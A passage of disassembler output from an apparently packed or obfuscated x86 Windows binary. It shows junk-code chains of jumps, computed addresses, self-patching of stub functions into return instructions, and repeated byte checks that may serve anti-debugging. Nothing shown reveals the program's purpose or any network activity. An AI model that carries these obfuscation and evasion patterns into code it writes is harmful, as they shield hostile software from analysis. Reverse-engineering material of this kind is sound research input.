jmp loc_43AECF
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E8A5
loc_452F6B: ; CODE XREF: sub_44E8A5+31j
jz loc_43F876
pushf
jmp loc_44E6C3
; END OF FUNCTION CHUNK FOR sub_44E8A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_452F77: ; CODE XREF: sub_444273:loc_45A62Dj
imul byte ptr [edx]
cmp al, 0A4h
jz loc_44BE57
jmp loc_4519A4
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_452F86: ; CODE XREF: sub_4469B9-8AE6j
pop ebp
mov eax, ds:dword_43A7C4
or eax, eax
jnz loc_455404
jmp loc_4395D3
; END OF FUNCTION CHUNK FOR sub_4469B9
; ---------------------------------------------------------------------------
jmp ds:off_41D054
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_452FA0: ; CODE XREF: sub_443BC5:loc_447EE7j
; ut7h7i2x:loc_44A193j ...
jz loc_44EA1C
pop edx
mov eax, [esp+0]
push edx
jmp loc_439DD6
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_452FB0: ; CODE XREF: sub_455AD6:loc_4502D4j
push offset sub_446C7B
jmp loc_4504C7
; END OF FUNCTION CHUNK FOR sub_455AD6
; ---------------------------------------------------------------------------
and ebp, ebx
jmp loc_44266E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B120
loc_452FC2: ; CODE XREF: sub_43B120+3j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43B120
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_452FC7: ; CODE XREF: sub_449DC4-10B7Cj
jmp loc_44E21D
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
loc_452FCC: ; CODE XREF: ut7h7i2x:0044C4E0j
jns loc_43EEF4
loc_452FD2: ; CODE XREF: ut7h7i2x:0044ED13j
jmp loc_43F01A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_452FD7: ; CODE XREF: sub_4503C3-87CEj
jmp loc_43C364
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
sbb eax, edx
; START OF FUNCTION CHUNK FOR sub_457A66
loc_452FDE: ; CODE XREF: sub_457A66:loc_4467FEj
; ut7h7i2x:loc_4492EAj
cmp eax, esi
jmp loc_450D6E
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_452FE5 proc near ; DATA XREF: sub_443A45:loc_440A7Eo
; FUNCTION CHUNK AT 0043B3A6 SIZE 00000005 BYTES
add eax, 0F2507AACh
add eax, ebp
push offset loc_441139
jmp loc_43B3A6
sub_452FE5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_452FF7: ; CODE XREF: sub_44D5BE:loc_443E22j
rol esi, 1Eh
add esi, 0CA5444E4h
mov [esi], eax
call sub_445401
loc_453007: ; CODE XREF: sub_449DFF-6E59j
jmp loc_44BD87
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_45300C: ; CODE XREF: sub_4396F5+157F8j
ror eax, 7
cmp esi, eax
jmp loc_45416A
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_453016: ; CODE XREF: sub_454B2B:loc_455D85j
add esi, 566616E3h
or esi, ds:4000F7h
add esi, 0AAC4EA15h
add ebp, esi
add ebp, 8A3B85FCh
push ebp
pop esi
mov esi, [esi]
jmp loc_452B29
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_453039: ; CODE XREF: sub_44B68F:loc_44572Fj
add edx, 3D8ADED4h
xchg edx, [esp+4+var_4]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451039
loc_453047: ; CODE XREF: sub_451039:loc_443FEBj
mov ds:dword_43A798, eax
mov ds:byte_43E398, 1
loc_453053: ; CODE XREF: sub_446C7B-2569j
lea eax, [ebp-14h]
xor edx, edx
call sub_43F058
loc_45305D: ; CODE XREF: ut7h7i2x:00444649j
; sub_451039+4j
mov eax, ds:dword_43A798
jmp loc_43F04E
; END OF FUNCTION CHUNK FOR sub_451039
; ---------------------------------------------------------------------------
loc_453067: ; DATA XREF: sub_44C95C+9o
push ecx
mov esp, ebp
push 440D5Dh
jmp locret_44E1BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_453074: ; CODE XREF: sub_4544E6-146D8j
xor edx, edx
push edx
push eax
jmp loc_43F87E
; ---------------------------------------------------------------------------
loc_45307D: ; CODE XREF: sub_4544E6:loc_43FFFBj
mov eax, [ebp-4]
call sub_43CFB6
loc_453085: ; CODE XREF: sub_459FE9-29BBj
jmp loc_458099
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4522DD
loc_45308A: ; CODE XREF: sub_4522DD+28B8j
jmp loc_4418F9
; END OF FUNCTION CHUNK FOR sub_4522DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_349. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4475A8
loc_453090: ; CODE XREF: sub_4475A8+Aj
jmp loc_4542B8
; END OF FUNCTION CHUNK FOR sub_4475A8
; ---------------------------------------------------------------------------
loc_453095: ; CODE XREF: ut7h7i2x:00458DF1j
shr ecx, 1Ch
loc_453098: ; CODE XREF: ut7h7i2x:loc_45A991j
call nullsub_474
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_45309E: ; CODE XREF: sub_45A25C-49F8j
jmp loc_446E82
; END OF FUNCTION CHUNK FOR sub_45A25C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EEB2
loc_4530A3: ; CODE XREF: sub_44EEB2+3j
jmp sub_447F8A
; END OF FUNCTION CHUNK FOR sub_44EEB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_4530A8: ; CODE XREF: sub_439170+1485Bj
jmp nullsub_445
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440DAB
loc_4530AD: ; CODE XREF: sub_440DAB+3j
jmp loc_43C246
; END OF FUNCTION CHUNK FOR sub_440DAB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_474. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440FC3
loc_4530B3: ; CODE XREF: sub_440FC3+17703j
jmp loc_454E5A
; END OF FUNCTION CHUNK FOR sub_440FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457E3D
loc_4530B8: ; CODE XREF: sub_457E3D-14813j
jmp loc_43BD0E
; END OF FUNCTION CHUNK FOR sub_457E3D
; ---------------------------------------------------------------------------
locret_4530BD: ; CODE XREF: ut7h7i2x:00446DD7j
; ut7h7i2x:0044E328j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_492. PRESS KEYPAD "+" TO EXPAND]
db 0C5h
db 9Ah, 0FEh, 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_434. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4530C4: ; CODE XREF: ut7h7i2x:0044679Ej
jmp locret_440AA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44491C
loc_4530C9: ; CODE XREF: sub_44491C+5j
jmp loc_459A6B
; END OF FUNCTION CHUNK FOR sub_44491C
; ---------------------------------------------------------------------------
loc_4530CE: ; DATA XREF: sub_439B17+6o
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-0Ch], eax
xor eax, eax
jmp loc_441EC1
; ---------------------------------------------------------------------------
loc_4530DE: ; CODE XREF: ut7h7i2x:004534DDj
jz loc_451E65
jmp loc_44836C
; ---------------------------------------------------------------------------
loc_4530E9: ; CODE XREF: ut7h7i2x:loc_43A56Bj
js loc_4568B1
push offset loc_456AFE
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_4530F4: ; CODE XREF: sub_43CAF4-2861j
jmp loc_458078
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445D25
loc_4530F9: ; CODE XREF: sub_445D25:loc_44AB63j
mov eax, 0EA34346Fh
call sub_43AA94
mov ds:dword_41D1B8, eax
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
jmp nullsub_1
; END OF FUNCTION CHUNK FOR sub_445D25
; ---------------------------------------------------------------------------
loc_453117: ; CODE XREF: ut7h7i2x:loc_444014j
and ecx, 18047C6Ah
or ecx, 8DEDD871h
add ecx, 6255C7D1h
mov ecx, [ecx]
xchg ecx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_45312F: ; CODE XREF: sub_4417AF+11j
jmp loc_44D447
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_453134: ; CODE XREF: sub_43C9F5+23j
jmp loc_4576AA
; END OF FUNCTION CHUNK FOR sub_43C9F5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_453139 proc near ; CODE XREF: sub_454ABBj
; FUNCTION CHUNK AT 00449A0C SIZE 0000001C BYTES
push ebp
mov ebp, esp
jmp loc_449A0C
sub_453139 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A06
loc_453141: ; CODE XREF: sub_443A06+16j
add eax, 0EC09F164h
add eax, ebp
call sub_455127
loc_45314E: ; CODE XREF: ut7h7i2x:0043FAAFj
jmp loc_43F9B9
; END OF FUNCTION CHUNK FOR sub_443A06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_453153: ; CODE XREF: sub_444AA3-33ABj
jz loc_453B10
jmp loc_452BD1
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45315E: ; CODE XREF: sub_457A66:loc_45235Cj
and edx, 0D26E02FEh
xor edx, 47D9738Ah
add edx, ebp
push esi
push offset sub_45A32D
jmp loc_443CD7
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_453177 proc near ; CODE XREF: sub_4529E0-E976j
retn
sub_453177 endp
; ---------------------------------------------------------------------------
loc_453178: ; CODE XREF: ut7h7i2x:004466D7j
jmp sub_44261F
; ---------------------------------------------------------------------------
loc_45317D: ; CODE XREF: ut7h7i2x:loc_443754j
jge loc_456C05
jmp loc_443842
; =============== S U B R O U T I N E =======================================
sub_453188 proc near ; CODE XREF: sub_45A0A5-1C426p
; ut7h7i2x:00449169j
; FUNCTION CHUNK AT 0044AD7A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004517B1 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
pop edi
push esi
pushf
push 89987D85h
pop esi
sub esi, 0ACFABB7Dh
jmp loc_44AD7A
sub_453188 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446B90
loc_4531A0: ; CODE XREF: sub_446B90+1865j
mov [esi], eax
pop esi
call sub_44602A
loc_4531A8: ; CODE XREF: sub_459081-7A19j
jmp sub_45341C
; END OF FUNCTION CHUNK FOR sub_446B90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_4531AD: ; CODE XREF: sub_4481A2+12j
jmp loc_44779F
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4531B2: ; CODE XREF: sub_443BC5+1550j
jmp loc_44EA0E
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_4531B7: ; CODE XREF: sub_448CBC:loc_4446E0j
jz sub_4518D7
jmp loc_43E9F9
; END OF FUNCTION CHUNK FOR sub_448CBC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_427. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_4531C3: ; CODE XREF: sub_45967C:loc_43ABB0j
test edx, 836B67A2h
jmp loc_441A43
; END OF FUNCTION CHUNK FOR sub_45967C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4531D0: ; CODE XREF: ut7h7i2x:loc_441834j
pop ecx
rol ecx, 0Dh
xor ecx, 4CBD25BCh
add eax, ecx
xchg edx, [esp]
mov ecx, edx
jmp loc_4513F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BD9
loc_4531E6: ; CODE XREF: sub_443BD9:loc_4599A7j
add edi, 52288CB5h
mov [edi], eax
push offset loc_459CE1
jmp loc_43DAD3
; END OF FUNCTION CHUNK FOR sub_443BD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_466. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4531F9: ; CODE XREF: ut7h7i2x:00440F89j
jmp loc_445948
; ---------------------------------------------------------------------------
cdq
and edx, 0AC2AB801h
jmp sub_4505CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_45320A: ; CODE XREF: sub_4408C2+C634j
mov eax, 0BCFA2582h
adc ecx, ebx
and ecx, esi
jmp loc_44D89D
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_453218: ; CODE XREF: sub_43A76A+1F418j
add eax, 0F2D0B6A5h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_44E828
jmp loc_445619
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
pop esi
jb loc_451841
jmp sub_450645
; ---------------------------------------------------------------------------
loc_45323A: ; CODE XREF: ut7h7i2x:0043D2E3j
; ut7h7i2x:loc_45A6BFj
push 448DF43h
pop eax
sub eax, 0C2EB4F52h
add eax, 57F96599h
test eax, 40000000h
jmp loc_43BB56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_453257: ; CODE XREF: sub_4549F0:loc_44CE80j
mov edi, edx
jmp loc_456275
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
loc_45325E: ; CODE XREF: ut7h7i2x:0043BA16j
; ut7h7i2x:00452BB7j
and edx, 7E8F9DC2h
xor edx, 0CCAAA907h
add edx, 1621D85Eh
xchg edx, [esp]
jmp sub_456520
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_453278: ; CODE XREF: sub_43A556+1D1E9j
jge loc_443352
xchg ebx, [esi]
sbb ebp, ebx
mov edx, 3434C64h
sbb esi, edx
jmp loc_4439EF
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_45328E: ; CODE XREF: sub_450FDE:loc_4485A9j
push 94F8287h
pop ebx
add ebx, 999765Ah
xor ebx, 252A90C6h
add ebx, 0C41C33FCh
jmp loc_45455C
; END OF FUNCTION CHUNK FOR sub_450FDE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4443DE
loc_4532AC: ; CODE XREF: sub_4443DE:loc_44C58Bj
jnz loc_45398D
ror ebx, 1
mov [eax], ebx
push edi
jmp loc_45398D
; END OF FUNCTION CHUNK FOR sub_4443DE
; ---------------------------------------------------------------------------
test edx, 0BDD351F1h
jmp loc_443FB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F000
loc_4532C7: ; CODE XREF: sub_44F000+A9CCj
mov [esi], eax
push offset sub_457A45
jmp loc_448B26
; END OF FUNCTION CHUNK FOR sub_44F000
; =============== S U B R O U T I N E =======================================
sub_4532D3 proc near ; CODE XREF: sub_44FDD8+3j
add esp, 0FFFFFFF8h
mov [ebp-4], eax
push offset loc_44F61F
jmp nullsub_160
sub_4532D3 endp
; =============== S U B R O U T I N E =======================================
sub_4532E3 proc near ; CODE XREF: ut7h7i2x:00455C15j
; sub_43B9B1:loc_4565C8p
xchg ebx, [esp+0]
pop ebx
mov ds:dword_44665C, eax
retn
sub_4532E3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_4532EE: ; CODE XREF: sub_44DB48+8j
rol eax, 7
jmp loc_448151
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B4E3
loc_4532F6: ; CODE XREF: sub_43B4E3+1DF19j
add edx, edi
pop edi
push offset sub_439B27
jmp loc_43A781
; END OF FUNCTION CHUNK FOR sub_43B4E3
; =============== S U B R O U T I N E =======================================
sub_453303 proc near ; CODE XREF: ut7h7i2x:00453C3Aj
; ut7h7i2x:loc_453FE7p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
push edx
pop ecx
xchg ecx, [esp-4+arg_0]
jmp loc_44F8DC
sub_453303 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_453312: ; CODE XREF: ut7h7i2x:00441495j
jmp loc_45A6BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_453317: ; CODE XREF: sub_457A0D:loc_441A1Dj
push edx
push 0FD2BD626h
pop edx
rol edx, 1Ch
jnb loc_44B702
; END OF FUNCTION CHUNK FOR sub_457A0D
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_453327: ; CODE XREF: sub_4508DB+5AB7j
jmp loc_459CF4
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45332C: ; CODE XREF: sub_43DBEC+E839j
jmp loc_43A73D
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_453331: ; CODE XREF: ut7h7i2x:00447C67j
jmp loc_447AED
; ---------------------------------------------------------------------------
loc_453336: ; CODE XREF: ut7h7i2x:00449727j
ror ebx, 0Fh
sub esi, 2B6284E0h
jmp loc_447A05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_453344: ; CODE XREF: sub_43FCEE:loc_44E7B5j
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_43D9D7
jmp loc_450FB8
; END OF FUNCTION CHUNK FOR sub_43FCEE
; =============== S U B R O U T I N E =======================================
sub_453354 proc near ; CODE XREF: ut7h7i2x:loc_44625Ep
; ut7h7i2x:0044B897j
; FUNCTION CHUNK AT 0044CFCC SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov ds:dword_41D188, eax
lea eax, nullsub_456
mov byte ptr [eax], 0C3h
jmp loc_44CFCC
sub_453354 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
jmp loc_44688B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4415EB
loc_453375: ; CODE XREF: sub_4415EB+Cj
push 82DAB29Bh
pop ebx
and ebx, 0FAEF68C4h
xor ebx, 8A5396D5h
rol ebx, 4
and ebx, 0BAA5708h
add ebx, 0F6BB25F5h
call sub_43AE31
loc_45339B: ; CODE XREF: ut7h7i2x:0044C9CEj
jmp sub_4454EA
; END OF FUNCTION CHUNK FOR sub_4415EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_4533A0: ; CODE XREF: sub_442E76:loc_45AE36j
mov esi, edx
xchg esi, [esp+4+var_4]
push offset loc_447079
jmp loc_43BFEC
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B513
loc_4533AF: ; CODE XREF: sub_43B513+1C8DFj
rol esi, 1Dh
add edi, ebx
xchg ebp, edx
mov edi, esi
jmp loc_44D711
; END OF FUNCTION CHUNK FOR sub_43B513
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_357. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_269. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4505CE
loc_4533BF: ; CODE XREF: sub_4505CE+1Bj
xor esi, 5A0EBC0Eh
add esi, 76EB3236h
xchg esi, [esp-4+arg_0]
jmp loc_4525CE
; END OF FUNCTION CHUNK FOR sub_4505CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_4533D3: ; CODE XREF: sub_445188:loc_4464CFj
jz loc_44E823
jmp loc_445888
; END OF FUNCTION CHUNK FOR sub_445188
; =============== S U B R O U T I N E =======================================
sub_4533DE proc near ; CODE XREF: sub_43F1B2-521Dp
; ut7h7i2x:0043A84Dj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A77B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F3CB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004415C3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00445BF1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F4F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558C2 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
call sub_4594B7
loc_4533E7: ; CODE XREF: sub_43F1B2:loc_4405C0j
; sub_43F1B2+C6FFj
xchg eax, [esp+0]
mov edx, eax
jmp loc_4558C2
sub_4533DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4533F1: ; CODE XREF: sub_439BD1:loc_44E7BAj
jz loc_45793C
jmp loc_44EC7F
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
locret_4533FC: ; CODE XREF: ut7h7i2x:004430CCj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446C7B
loc_4533FD: ; CODE XREF: sub_446C7B+106A5j
jmp sub_455807
; END OF FUNCTION CHUNK FOR sub_446C7B
; ---------------------------------------------------------------------------
dw 0CA13h
dd 0EFE9D585h
db 0BEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_45340B: ; CODE XREF: ut7h7i2x:0044E021j
push edx
; =============== S U B R O U T I N E =======================================
sub_45340C proc near ; CODE XREF: sub_4503C3+1AA8p
xchg edx, [esp+0]
pop edx
pop ebp
retn
sub_45340C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_453412: ; CODE XREF: sub_4576C6+Dj
jmp loc_448F6F
; END OF FUNCTION CHUNK FOR sub_4576C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_453417: ; CODE XREF: sub_440CEC+1j
jmp loc_4430D2
; END OF FUNCTION CHUNK FOR sub_440CEC
; =============== S U B R O U T I N E =======================================
sub_45341C proc near ; CODE XREF: sub_439BF8+C32p
; sub_4450AC+Ap ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D2B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E3AF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004410AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004412A8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441C5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CA5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044541C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448327 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004499B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA22 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B1C5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044CBA5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E776 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004501E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459218 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A395 SIZE 00000015 BYTES
push ebp
jmp loc_4499B9
sub_45341C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shl esi, 8
jmp loc_45378F
; ---------------------------------------------------------------------------
loc_45342A: ; CODE XREF: ut7h7i2x:loc_45630Fj
push 0
call sub_43C1E5
loc_453431: ; CODE XREF: ut7h7i2x:00443C96j
jmp loc_442DDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_453436: ; CODE XREF: sub_44DD56-C9DEj
jmp loc_4420FB
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
push offset sub_443D3B
jmp nullsub_382
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_453445: ; CODE XREF: sub_44445F:loc_44130Ej
pop esi
xor esi, 9E6D5A22h
rol esi, 7
cmp esi, 0EB551D4Bh
jmp loc_442527
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4561A8
loc_45345A: ; CODE XREF: sub_4561A8+Dj
xor edx, edx
call sub_43F058
; END OF FUNCTION CHUNK FOR sub_4561A8
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_453461: ; CODE XREF: sub_44C8F3+Ej
; sub_45500F:loc_44F4DEj
mov eax, ds:dword_43A044
mov [ebp-4], eax
push offset sub_44FE04
jmp nullsub_163
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
loc_453473: ; CODE XREF: ut7h7i2x:00441649j
shr ecx, 0Fh
; =============== S U B R O U T I N E =======================================
sub_453476 proc near ; CODE XREF: ut7h7i2x:loc_456EF8p
xchg ecx, [esp+0]
pop ecx
add eax, 2617EABCh
add eax, 0D9E815ACh
mov eax, [eax]
push edx
jmp loc_4525C9
sub_453476 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_555. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A2F5
loc_45348F: ; CODE XREF: sub_43A2F5+7j
jmp loc_43D8C2
; END OF FUNCTION CHUNK FOR sub_43A2F5
; ---------------------------------------------------------------------------
xor esi, edx
shr eax, 17h
jmp sub_449406
; ---------------------------------------------------------------------------
loc_45349E: ; CODE XREF: ut7h7i2x:loc_45227Cj
jnz loc_44323A
jmp loc_449751
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450E41
loc_4534A9: ; CODE XREF: sub_450E41-22BEj
add edx, 7F21B860h
mov [edx], eax
pop edx
; END OF FUNCTION CHUNK FOR sub_450E41
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4534B2: ; CODE XREF: sub_443BC5:loc_454346j
push offset aLesbE0twhU__s ; "‹EèÀe!0TWh²ÎU._éÂ\b"
jmp nullsub_253
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_4534BC: ; CODE XREF: sub_4393B6:loc_4547AFj
xchg ebx, [esp-4+arg_0]
jmp loc_456B99
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
loc_4534C4: ; CODE XREF: ut7h7i2x:loc_43B93Fj
; ut7h7i2x:0043B950j
xor eax, 0A24C7036h
add eax, ebp
add eax, 0C0FF14F7h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_451E6A
jmp loc_4530DE
; ---------------------------------------------------------------------------
loc_4534E2: ; CODE XREF: ut7h7i2x:loc_4468EFj
jnp loc_454122
jmp loc_457647
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_4534ED: ; CODE XREF: sub_43F66D+92C6j
jz loc_43A97D
ror ecx, 1Bh
jmp loc_43A97C
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
loc_4534FB: ; CODE XREF: ut7h7i2x:00443F45j
inc dword ptr [ebp-8]
loc_4534FE: ; CODE XREF: ut7h7i2x:00447F05j
; ut7h7i2x:loc_451A20j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
